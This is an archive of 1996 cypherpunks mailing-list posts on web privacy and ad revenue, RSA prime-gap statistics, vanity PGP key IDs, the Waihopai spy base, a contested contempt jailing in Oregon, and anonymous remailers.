They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip M. Hallam-Baker" <hallam@w3.org>
Date: Mon, 4 Mar 1996 06:08:08 +0800
To: cypherpunks@toad.com
Subject: Re: NYT login
Message-ID: <199603032135.QAA21850@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Just Rich wrote:
> 
> Rumour has it that there might be a cpunks/cpunks (cypherpunks was taken).

This brings up an interesting prtoblem which I have been trying to
solve. How can we fund content providers on the Web while not
compromising privacy?

Early on I targeted political and governmental sites as likely users of
the Web. This also reflected a personal belief that I have in open
government. What I did not anticipate was the speed with which the
mainstream press started appearing on the Web. In part this was due to
the Whitehouse server which has legitimized the Web in many corporated
boardrooms.

There is a problem though, nobody has a fully convincing revenue model
yet. This will have to chage if sites like the NYT are going to stay
online. Ideally I would like these sites to be free to the readers
because it helps break down international chauvnism and petty minded
nationalism. I believe that the significant number of trans-national
relationships forged over the internet have lead to a significant shift
in support for French Nuclear testing for example. Ten years ago many
French supported terrorism such as the sinking of the Rainbow warrior in
persuit of this policy, this time round there has been much less support
for the government posistion.

The challenge therefore is to find a means by which NYT etc can pay
their staffs. Advertising is an obvious mechanism but here there is a
problem. Advertisers need to know what they are receiving by way of
value for money. Don't believe the stories of $50K per month advertising
charges, many of these prices are very heavily discounted. $50K is what
advertisers are willing to pay once they know for sure the Web works for
them.

If we apply traditional advertising logic it would be necessary to use
very intrusive methods to discover how effective the Web is. This is not
necessarily the case on the Web since it is an interactive medium. As
Jock Gill pointed out at a recent conference we organised, instead of
targetting customers the Web permits a participatory process which may
be far more profitable for big name brands, allowing them to establish
the high value long term relationships they really want.

So the question is how can we square the circle? I have no problem
telling the NYT's advertisers that NYT have a reader who is in the high
tech goodies purchasingcategory. I have a serious problem allowing the
government to know that I read the NYT, remember that in many countries
that could lead to getting you arrested. I also think we need to be
cautious about comapnies collecting similar information. Imagine for a
moment that the US elected a fascist president opposed to "left wing
intellectuals". It would be a bad thing if he could obtain a list of
likely left wing intellectuals compiled from readership of various
magazines, visiting of left wing Web sites etc. This is a live issue in
Holland where no phone records are kept because stored records were used
by the NAZIs when they were invaded to find out who was talking to whom.


Some Ideas I had:

	1) An anonymous session identifier generated by the browser
	constructed in a cryptographically secure manner so as to
	prevent linkage across sites.

	This would allow NYTs to find out that a reader had moved 
	from the sports section to the politics section within the 
	site but not to track them from the NYT to Time Warner.

	2) A privacy code of conduct. Sites adhering to this code
	would be alowed to display a trademarked icon on their
	pages. 

	This code would cover items such as not selling log files
	not maintaining online records of identity. 

There are many people who are willing to put in the effort to make the
Web a place where people can interact in privacy. I know very senior
people in very large companies who are as concerned as many cypherpunks
on this issue. The point is that we need to come up with a scheme which
addresses their legitimate business needs and protects privacy.
Otherwise the market will decide and it does not care much about
privacy.


I have written up some working drafts. You can get them from the IETF in
ascii text or via the web as W3c working drafts http://w3.org/



	Phill Hallam-Baker
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMToQuyoZzwIn1bdtAQFSZgGAwMeBfDr4g3yBclG08m6f8K2Ml1Gv07i1
L5wybpz4/8o4Gy7/P3UUP+82IcEpgGrl
=hUU/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Mon, 4 Mar 1996 06:34:44 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: (fwd) USA / Australia - Civil Liberty
In-Reply-To: <199603030753.RAA12050@suburbia.net>
Message-ID: <Pine.SUN.3.91.960303163035.25492J-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


The following concerns a fragment from a message that seems to have been 
posted to "aus.legal" and to c'punx.  Please feel free to forward to 
aus.legal if you have access to that group.

On Sun, 3 Mar 1996, Julian Assange wrote:

> 
> Under USC 28, 1603, (B)(3) Ms. Wilson is an alien and the US
> Federal court has no jurisdiction over her.

Highly dubious.  The court has full jurisdiction over all non-ambassadors
in its jurisidiction.  Whatever passport they may hold.  The cited text
relates to the immunity of foreign states and their ambassadors and their
political subdvisions.  It is not an exemption for all tourists, foreign
workers or the like. 


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's not warm here today.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip M. Hallam-Baker" <hallam@w3.org>
Date: Mon, 4 Mar 1996 06:15:48 +0800
To: cypherpunks@toad.com
Subject: Re: Netcom and Credit Cards
Message-ID: <199603032140.QAA21879@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Anonymous wrote:

> > The "credit card numbers were stolen" point, that I believe Ed Carp was
> > referring to, had to do with the Mitnick affair, and is very old news.
> 
> The fact that they had been stolen was mentioned in an edition of 2600
> 6 months before the Mitnick saga.  Netcom had been told about the
> security breaches many times, but refused to acknowledge that their
> site was insecure.  It was this arrogance that pissed people off
> more than their insecurity.

As someone who was involved in the recent iKP / SEPP /STT / --> SET
event I would like to point out that it was the storage of CC numbers in
databases connected to the Internet which was the primary concern of
credit card companies. 

Sending credit card numbers across the internet in the clear was to an
extent a side issue. Clearly if the merchant was nopt going to be able
to store the number the number would have to not be received in
cleartext by the merchant.


	Phill
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMToR2yoZzwIn1bdtAQEBDAF+Mgb3VluBwhqkjIgPCJ5YurkDWWm9MRwg
RJoqXdalTBmM20ldY5qddiuTGoxni4ac
=9L/X
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 4 Mar 1996 11:34:04 +0800
To: cypherpunks@toad.com
Subject: book idea: info terrorism/espionage etc.
Message-ID: <199603040045.QAA24345@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



hey, I understand a sequel to Puzzle Palace by Bamford and someone
else is due to be published soon.  is this correct? when is the
due date? has anyone heard about this? I've been seeing a lot
of early lead articles from other reporters, such as a GNN
article awhile ago, and an assertion that the NSA is working
with the GCHQ to monitor American citizens.

I was just thinking what an interesting book this could be. if
it doesn't cover the ideas of "information terrorism" that are
hinted in e.g. Strassman's remailer paper, it seems this is a 
vacuum that could be filled with a very significant/interesting
tome by someone.

I hope Levy's cryptography book covers some of these areas too.
I would like to just see one entire chapter dedicated to the way
the spooks seem to be doing a "bait and switch" now that the cold
war is over, with economic espionage and all that. easily an entire
book could be dedicated to this subject.

I've seen a lot of editorials on reforming the spook apparatus,
and it seems now is the prime moment for some very influential books
to come out to influence future policy ideas.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Grant, M.A. (Oxon)" <mark@unicorn.com>
Date: Mon, 4 Mar 1996 01:03:52 +0800
To: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Subject: Re: Anonymous Web Browsers
Message-ID: <Pine.3.89.9603031635.A25144-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Mar 1996, A. Padgett Peterson P.E. Information Security wrote:

[Netscape mailto]
>   Disabling is easy, just do not specify a mail server (or better, one that
>   will refuse mail) in "options/preferences/mail and news". Netscape (at least
>   1.1n) initiates a port 25 connection to the designated server to send mail.

Tried that. Doesn't work with 2.0 on SunOS, it just connects to localhost 
instead...

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 6 Mar 1996 13:15:34 +0800
To: cypherpunks@toad.com
Subject: Re: Truelly Random Numbers
Message-ID: <199603040052.QAA20279@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>At 10:11 AM 3/3/96 -0500, Gary Howland wrote:
>>Surely the process of counting up until you get a prime means
>>that the chances of getting certain primes are greater than
>>others (eg. 17 is more likely than 19) ?

At 11:07 AM 3/3/96 -0800, jamesd@echeque.com wrote:
>In order to use this information, one would need to determine 
>the number of primes in the vicinity of a potential prime factor.  
>This costs more than actually checking for the factor, hence is 
>not useful.

The discussion has been about probability of collisions,
rather than usable exploits - they're still rare enough that
it's a birthday-problem issue.

While you're more likely to pick a specific prime with a
large gap before it than one with a small gap before it,
there are a lot more small gaps than large ones,
assuming that primes are roughly uniformly distributed
within any given range (which is roughly true) and
that therefore the gaps are geometrically distributed.

I worked an example for random 384-bit primes, which you'd
use to generate 768-bit RSA keys.  The density of primes
is approximately 1/ln384 = 1/266 = 1/meanlength. 
The unweighted quartile gap lengths are 77, 186, and 372.
The weighted quartiles for the gaps are 255, 447, and 720 ;
these correspond to unweighted cdfs of 61%, 81%, and 93%.

So, yes, it's a bit skewed (and enough that I'd rather not
work the birthday problem math, which is far easier with uniforms :-)
But it's probably not skewed enough to affect the number of 
primes required for a collision to occur by more than a factor
of 100 or so, and collisions in RSA keys require collisions in
both primes.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 4 Mar 1996 11:32:41 +0800
To: cypherpunks@toad.com
Subject: Destroying the Internet in order to save the Internet
Message-ID: <ad5f8031000210046198@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



WARNING: If you are under 18, do not read or download this message! You
have been warned, and I take no further responsibility for your actions. It
has become necessary under the Communications Decency Act to make this
warning. Furthermore, quoted material may also contain material, so
censorship of certain words and ideas may be necessary.

At 11:14 PM 3/3/96, Bill Frantz wrote:

>One of the private pilot magazines reported that a small plane operator
>used the code (because his airplane was, in fact, being hijacked).  When he
>landed the airplane, it was surrounded by LEA, and in the ensuing gun
>battle, everyone on the airplane died.  The went on to say that the safety
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

The pilot was flying an airplane. Airplanes are often used to transport drugs.

Sometimes you have to destroy the village in order to to save the village.

(A lesson being used by those who realize we have to destroy free speech in
order to save free speech, and to destroy the Internet in order to save the
Internet. Blair House is aptly named.)

--Alan Smithee







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Rose <Greg_Rose@sydney.sterling.com>
Date: Sun, 3 Mar 1996 14:30:47 +0800
To: "A. Padgett Peterson P.E. Information Security"@sydney.sterling.com
Subject: Re: Problems with certificates.
In-Reply-To: <960301083512.202002a4@hobbes.orl.mmc.com>
Message-ID: <pgpmoose.199603031709.12328@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain


  Next rage might well be "vanity" PGP keys. While at the moment it is not known
  how to create a specific match key to a sequence, if you generate enough
  keys, there will be some interesting sequences found. Possibly some PGP
  signatures will even be in violation of the CDA (now that should start a
  rush 8*).

That's not quite correct. The part about it not
being known, I mean. I created a key:

	Type bits/keyID    Date       User ID
	sec  1024/DEADBEEF 1995/09/28 Prime Rib Lovers
	sig       DEADBEEF             Prime Rib Lovers

(note: DEADBEEF seems about the most interesting
8-character hex word -- CAFE doesn't seem to go
with anything...)

And Christopher Drake (http://pobox.com/~netsafe)
has mailed out a key which has a company
advertisement in its ASCII armor. Hmmm. I thought
I kept it around, but I can't find it. Ahhh.
There it is.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.i

mQCNAjD/mQAAAAEEAP/////NetSafe+PGP+key////We+provide+inexpensive
AntiFraud/theft+etc+Security+Software5tGfKREuINIWsQqsLNS+uAneN9M
SuMu37f+NU/U2djtxE/b9h4bJ4wb8h3QkBiuTAS1QjpxpxryQzZ10zzGQe8VAAUR
tChDaHJpc3RvcGhlciBOLiBEcmFrZSA8TmV0U2FmZUBQb2JveC5jb20+
=SGC/
-----END PGP PUBLIC KEY BLOCK-----

Type bits/keyID    Date       User ID
pub  1024/C641EF15 1996/01/19 Christopher N.  Drake <NetSafe@Pobox.com>

Greg.

Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr/
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Rose <Greg_Rose@sydney.sterling.com>
Date: Sun, 3 Mar 1996 14:30:38 +0800
To: PADGETT@hobbes.orl.mmc.com
Subject: Re: Problems with certificates.
Message-ID: <pgpmoose.199603031715.53760@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain


[Apologies if this appears twice -- I had a
posting problem.]

A. Padgett Peterson wrote:
  Next rage might well be "vanity" PGP keys. While at the moment it is not known
  how to create a specific match key to a sequence, if you generate enough
  keys, there will be some interesting sequences found. Possibly some PGP
  signatures will even be in violation of the CDA (now that should start a
  rush 8*).

That's not quite correct. The part about it not
being known, I mean. I created a key:

	Type bits/keyID    Date       User ID
	sec  1024/DEADBEEF 1995/09/28 Prime Rib Lovers
	sig       DEADBEEF             Prime Rib Lovers

(note: DEADBEEF seems about the most interesting
8-character hex word -- CAFE doesn't seem to go
with anything...)

And Christopher Drake (http://pobox.com/~netsafe)
has mailed out a key which has a company
advertisement in its ASCII armor. Hmmm. I thought
I kept it around, but I can't find it. Ahhh.
There it is.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.i

mQCNAjD/mQAAAAEEAP/////NetSafe+PGP+key////We+provide+inexpensive
AntiFraud/theft+etc+Security+Software5tGfKREuINIWsQqsLNS+uAneN9M
SuMu37f+NU/U2djtxE/b9h4bJ4wb8h3QkBiuTAS1QjpxpxryQzZ10zzGQe8VAAUR
tChDaHJpc3RvcGhlciBOLiBEcmFrZSA8TmV0U2FmZUBQb2JveC5jb20+
=SGC/
-----END PGP PUBLIC KEY BLOCK-----

Type bits/keyID    Date       User ID
pub  1024/C641EF15 1996/01/19 Christopher N.  Drake <NetSafe@Pobox.com>

I still assert there are a bunch of attacks
related to producing on-demand keyid's.

Greg.

Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr/
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Just Rich <rich@c2.org>
Date: Wed, 6 Mar 1996 13:38:43 +0800
To: cypherpunks@toad.com
Subject: Re: NYT login
In-Reply-To: <9603040042.AA20426@zorch.w3.org>
Message-ID: <Pine.SUN.3.91.960303171455.15462D-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Mar 1996 hallam@w3.org wrote:

> >The tobacco companies need a forum. And they are used to spending big 
> >bucks on sponsoring things.
> 
> That misses the point. There is no shortage of potential sponsors.
> What these people are asking me is "how much business will Web
> advertising create for me".

This misses another point. The question was, how do *we* pay for this 
stuff (emphasis mine).

If someone develops a reasonably easy-to-use and reasonably secure digital
cash micropayment system, then I would be happy to pay to read the New
York Times on the Web. I would rather they were dependent on my money than
R.J. Reynold's. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: proff@.suburbia.net (Julian Assange)
Date: Sun, 3 Mar 1996 16:32:17 +0800
To: cypherpunks@toad.com
Subject: (fwd) Re: The police came knocking
Message-ID: <199603030743.RAA11722@suburbia.net>
MIME-Version: 1.0
Content-Type: text/plain


Path: news.aus.world.net!news.us.world.net!news.inc.net!trellis.wwnet.com!nntp.coast.net!howland.reston.ans.net!newsfeed.internetmci.com!news.mel.aone.net.au!newshost.pcug.org.au!blchupin!blchupin
From: blchupin@pcug.org.au (Basil Chupin)
Newsgroups: tip.general,aus.org.efa,aus.legal
Subject: Re: The police came knocking
Message-ID: <09A420598905@pcug.org.au>
X-Mailer: Osiris v4.1 Registered To Basil Chupin
References: <4gisqm$s4c@wabbit.its.uow.edu.au>
Date: Sun, 25 Feb 96 17:06:59 +1000
Organization: Back To The Future CBIS, Canberra, Australia
Lines: 223
Xref: news.aus.world.net aus.org.efa:1808 aus.legal:2660

In article <4gisqm$s4c@wabbit.its.uow.edu.au>
Phil Herring <revdoc@uow.edu.au> writes:

> In article <312beb37.18538395@newshost.pcug.org.au> Owen Cook, 
> rcook@pcug.org.au writes:
>1. All traffic into and out of Australia passes thru this
>building at St Leonards
>2. Xty millions of dollars were spent by Telecom and ASIO to
>install, secretly, computers in the site.
>3. The purpose of the facility was to monitor all traffic thru
>keyword searches, originator and destination addressees.
> 
> Erm, no. It's just a version of the "NSA line eater" myth. Aside 
> from
> the fact that there are international links all over the place,
> including satellite uplinks and leased phone lines, the plain 
> truth of
> the matter is that the government just doesn't care about the 
> Internet
> all that much. Politically it's of little consequence, and law
> enforcement and "intelligence" services have small budgets that 
> just
> don't stretch to this kind of conspiracy.
> 
> On the other hand, the insecurity of email is legendary.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
 Date     : 10 Mar 94  13:11:46
 From     : Relay
 To       : All
 Subject  : Government Eavesdropping In New Zealand
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

 * Message originally :

     From: Relay
     To  : All
     Date: 10 Mar 94  11:42:35
     Area: alt.dcom.telcom

 * Forwarded by Tech Support using Sphinx! 2.0

The following article was posted to the Student Journalists
mailing list (STUMEDIA@UABDPO.BITNET) by Malcolm Hutchinson
(malcolmh@waikato.ac.nz).

     This is an article that appears as the centre feature in
     our first issue for the year. as the token NZ representative
     on this list, i thought i would post it to show that the US is
     not the only country experiencing problems keeping their
     govt in line when it comes to digital privacy & secure comms.

     NZ is known around the world for it's anti-nuke stand in the mid-
     eighties, yet we allow this sort of thing to continue. the waihopai
     spy base feeds information *directly* to the NSA.

     it is because of the existance of installations like this that i 
encourage

     all my digital friends to take control of their own information 
     and start using strong cryptographic software. PGP is available
     from any number of anon FTP sites around the world. get it, use it.
    
     i apologise if posting an article like this is considered wasting
     bandwith on this list

        y'all stay safe
        mal

title: The Biggest Sour Grape in Marlborough

At a predetermined signal the two groups of protesters split apart. The group
I was in went round the fence to the main gates and started pushing them back
and forward making a hell of a racket. The gate was secured in three places.
We broke the top padlock and the steel rod holding the gate in the ground. We
heard a shout from the other group. They were through the fence. Nine people
arrested and many more if we didn't stop our vigorous attack on the main
gates.

This was it, we were there to do something radical, to make our protest well
and truly heard. No-one had breached the huge inner fence of the Waihopai
Spybase for years. It was my first protest at Waihopai but not the last. The
Waihopai protest just South of Blenheim is an annual event organised by the
Anti-Bases Campaign (ABC). Ever since the first survey pegs were planted in
the ground in 1987, New Zealand women (originally) and men have protested
against the existence of the secretive Waihopai Spybase. Yet despite its
colourful history the vast majority of people still don't know it exists.

Held from January 27-29 this year's protest was larger than usual. About 80
people (including an unspecified number of university students) from Dunedin
to Auckland converged on a makeshift campsite nestled beside the Wairau River
to plan what action they would take against the Spybase and all it stands for.

The word "spybase" conjures images of undercover cops, secrecy, high security,
mystery and murder. While this is a bit dramatic there are similarities. The
Waihopai base is run by the Government Communications Security Bureau (GCSB),
a discrete organisation which only reports to the prime minister. Hidden in a
barren valley deep in the Marlborough outback, the Waihopai base is not
something the GCSB wants New Zealanders to know about. Workers at the base
aren't allowed to talk about what they do and even their spouses don't know
how much they earn. The base has a secret budget and secret objectives.
Secrecy is the aim and so far 'they' have been successful.

That is until 6.00pm Sunday night of the protest when on TV3 thousands of
viewers saw the Waihopai Spybase for the first time. The next day articles
were published in Sunday papers, with further articles in major daily papers
on the Monday. Supportive comments by Nelson MP John Blincoe added to the
debate on a topic usually considered closed. For the first time many New
Zealanders became aware that a government agency was spying on our neighbours
in the South Pacific and giving that information straight to the United
States.

What is a Spybase?

A more official name for the Spybase is Satellite Communications Station. This
sounds very innocent but there's no escaping the fact the base invades the
privacy of thousands of people, businesses governments and other organisations
throughout the South Pacific without their consent. The information gleamed is
not meant for the GCSB or the US, that's why it's called spying.

The base consists of an 18 metre receiving dish covered by a huge white dome,
an operations building and workshop, all protected by a 14ft security fence
backed by another electric fence, security cameras and floodlights. The base
monitors communications transmitted via satellite: private and commercial
telephone, fax, e-mail, telex and telegrams. These messages are scanned for
key words by computer. The information collected is then relayed to the GCSB
headquarters in the Freyberg building in Wellington. Useful information is
then sent to the United States National Security Agency or the larger Spybase
in Geraldton, Australia.

Why protest?

"The Waihopai Spybase uses your money to invade your privacy for other
countries' benefit?" This statement taken from an Anti-Bases Campaign pamphlet
about the base sums up the general reason why people are motivated enough to
protest, and to be arrested.

In the past, politicians like David Lange claimed the Waihopai base will give
New Zealand more independence in intelligence matters and that the information
would be under New Zealand control. However a document obtained from the US
Navy by peace researchers last year has confirmed long held suspicions that
the GCSB passes the intelligence collected at Waihopai to the powerful US
National Security Agency. This evidence completely contradicts the claims made
by New Zealand politicians. What's more, according to British investigative
journalist, Duncan Campbell, the Waihopai Spybase is part of a world wide
network of spybases monitoring satellite communications for the benefit of the
NSA.

What really sticks in the throats of those who know about the Waihopai Spybase
is that despite the fact that the information is given to the US, New Zealand
pays for it. Based on the costs of similar bases in other countries, the
Anti-Bases Campaign estimates that the base cost $20 million to set up and up
to $100 million so far. Protesters ask why should we be paying for this
'service' especially when we weren't even told about it.

The Waihopai Spybase was established without the consent of the New Zealand
people and operates without the permission of the Pacific countries who's
sovereignty it intrudes on. The Spybase is part of a reliance on military
power and cold war politics which reinforces the nuclear powers domination of
the globe. Instead of building relationships with our neighbours based on
trust, cooperation and peace we are furthering the interests of oppressive
military alliances by the world super powers.

Under international law it is in fact illegal to intercept international
communications. The activities of the Waihopai Spybase contravene the
International Tele-Communications Convention to which NZ has agreed. It is
also illegal under NZ law to act on such information.

The question we must ask ourselves is "Do we want New Zealand to participate
in this misuse of technology?" "Do we want to be consulted before we enter
into secret military alliances with the super powers? Would we rather the
money spent on spying was spent on education or health? Protesters at Waihopai
demand a Parliamentary inquiry into the activities of the GCSB, and that the
activities of this organisation be subject to review by the judicial system.
We also demand the closure of the Waihopai Spybase and the redirection of the
money spent on its operations to be put toward a peaceful future. Until this
happens we will continue to protest at Waihopai. I didn't try to be unbiased
in this article. For a start I was actively protesting the base myself. It is
also difficult to get another side to the story when politicians won't talk
about it. The head of the GCSB even refused to answer MP's questions in
Parliament about the Spybase. But secrets never last forever and thanks to the
New Zealand peace movement at least some of the truth is becoming public.

The more people who demand knowledge of the Spybase and accountability for its
operations, the more likely politicians will take notice. Already Nelson MP
John Blincoe (Labour) has come out in support of the Waihopai protest. In the
Christchurch Press Blincoe said international circumstances had changed and it
was time for the "cloud of secrecy" over the base to be lifted.

"The public is entitled to know what is being done from its own soil," said
Blincoe. "At the very least there should be Parliamentary scrutiny of Waihopai
and the other listening station, Tangimoana, near Palmerston North." Yes there
are other spybases, of different sorts, but did you know about them? I find it
unnerving to think people could be listening to my phone conversations, that
foreign spy networks are operating through New Zealand and I am helping
finance something I don't believe in. But then we don't have to like it and
nor do we have to accept it. It is our right to question and protest.

To find out more information about Waihopai and other bases in New Zealand
write to the Anti-Bases Campaign, PO Box 9314, Wellington. [NEW ZEALAND]

Paul Smith              wc 1345

   *********************************************************
  Malcolm Hutchinson         internet: malcolmh@waikato.ac.nz

   Editor: NEXUS 1994           The Waikato Students' Union
                                Te Wharae Wananga O Waikato
                                 Hamilton, New Zealand
                PGP Public Key available on request
   *********************************************************


--
Nigel Allen                     ae446@freenet.carleton.ca

----------------------------------------------------------
Basil Chupin         Internet: blchupin@pcug.org.au
                     Fidonet:  3.620.269.0 +61-6-285-2353
                     XLTNet:   370.100.1.0 +61-6-285-2353
----------------------------------------------------------


-- 
"I mean, after all;  you have to consider we're only made out of dust.  That's
 admittedly not  much  to  go  on  and  we  shouldn't  forget  that.  But even
 considering, I mean it's sort of a bad beginning, we're not doing too bad. So
 I personally have faith that even in this lousy situation we're faced with we
 can make it. You get me?" - Leo Burlero/PKD
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: proff@.suburbia.net (Julian Assange)
Date: Sun, 3 Mar 1996 16:32:02 +0800
To: cypherpunks@toad.com
Subject: (fwd) USA / Australia - Civil Liberty
Message-ID: <199603030753.RAA12050@suburbia.net>
MIME-Version: 1.0
Content-Type: text/plain


Path: news.aus.world.net!news.us.world.net!usenet
From: tomk@world.net
Newsgroups: aus.legal
Subject: USA / Australia - Civil Liberty
Date: Sun, 03 Mar 96 01:59:02 PDT
Organization: (none)
Lines: 78
Message-ID: <4hbcu6$jco@news.i.net>
NNTP-Posting-Host: portland04.world.net
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Newsreader: NEWTNews & Chameleon -- TCP/IP for MS Windows from NetManage


1 March, 1996
At 1:50 pm today PST in the Federal Court of the USA 
in the State of Oregon, an Australian national 
Ms. Amanda Wilson was unfairly incarcerated by Justice 
Haggerty of the US Federal Court.

During her incaceration, she was denied legal counsel, 
her request to have her embassy contacted was refused
and she was informed by the Sherrif of Oregon, that she had
no rights until she was transferred to a Federal Jail.

This individual was a witness in a civil case and was
neither named as the plaintiff nor the defendant.

Work that she had performed for the plaintiff under 
contract was not being paid for by the Plaintiff and Ms.
Wilson was not inclined to provide the information without
her agreed remuneration.

Justice Haggerty then claimed that Ms. Wilson was an agent 
of Koltai Inc and Thomas P. Kotlai and that her work was
not Intellectual Property owned by herself until 
remunerated.

Ms. Wilson claimed that she had evidence that she was 
acting as an independent agent. Justice Haggertys' response
was that "I'm not interested in your evidence".

Justice Haggerty ordered the Sherriff to detain Ms. Wilson
for Contempt of court.
Ms. Wilson then informed the court that she had done
nothing wrong and that she was an Australian resident.
The sherriff and his assistant then handcuffed and
removed Ms. Wilson to the holding cells on level four of the
Federal Courthouse in Portland.
She requested leave to contact her embassy. This was 
refused. She requested the right to counsel, this also was
refused. She then requested that the sherriffs office  
contact her parents in Australia to notify them of her
arrest. The sherriff refused this request.

She was then photographed, finger printed and informed that 
she would be removed to a jail later that afternoon if she 
did not comply with the courts order to divulge the 
passwords giving Ausnet Services Pty. Ltd. free access to 
her Intelectual Property.

Justice Haggerty then visited Ms. Wilson in the holding 
cells to counsel her.
Ms. Wilson requested from Judge Haggerty that she be allowed
to contact her father and/or the Australian Embassy.
Justice Haggerty declined this request.

Ms. Wilson then gave into the pressure applied and gave
the passwords required by Justice Haggerty.

During her three hours and fifteen minutes of incarceration
Ms. Wilson was humiliated with a personal body search.
Threatened with transport to a jail in California.
Informed that she had no rights and was generally verbally
and mentally abused.

Under USC 28, 1603, (B)(3) Ms. Wilson is an alien and the US
Federal court has no jurisdiction over her.

It is the opinion of this individual that the US Federal
Court has exceeded its authority and has failed to recognise
the civil rights of an Australian National.

This file was posted by:


Thomas P. Koltai
Ex Managing Director of Ausnet Services Pty. Ltd.
			(http://www/world.net)

Mobile: 1-503-260-3666

-- 
"I mean, after all;  you have to consider we're only made out of dust.  That's
 admittedly not  much  to  go  on  and  we  shouldn't  forget  that.  But even
 considering, I mean it's sort of a bad beginning, we're not doing too bad. So
 I personally have faith that even in this lousy situation we're faced with we
 can make it. You get me?" - Leo Burlero/PKD
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: electro <electro@newwave.net>
Date: Mon, 4 Mar 1996 07:33:07 +0800
To: cypherpunks@toad.com
Subject: Any Ideas??
Message-ID: <199603032256.RAA29581@ns.newwave.net>
MIME-Version: 1.0
Content-Type: text/plain


Hello im new to this mailing list and I have seen alot of talk about
re-mailers.  I run my schools netconnection (it was just a Win 3.11 Computer
before i got there) And I have installed Linux 1.2.8 (Slackware 2.3) (T-1
Connect!!!)  I want to setup as mutch anonmized stuff (It whould all be
free) that I can find.  I have wrote shell scripts that let you ftp stuff
and then download it by zmodem.  But i havent benable to find 
WWW Baised Remailer Software or The software that anon.pennet.fi uses (not
sure the name for it) If you have any ideas, or Places where I can find this
software. Please e-mail me





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
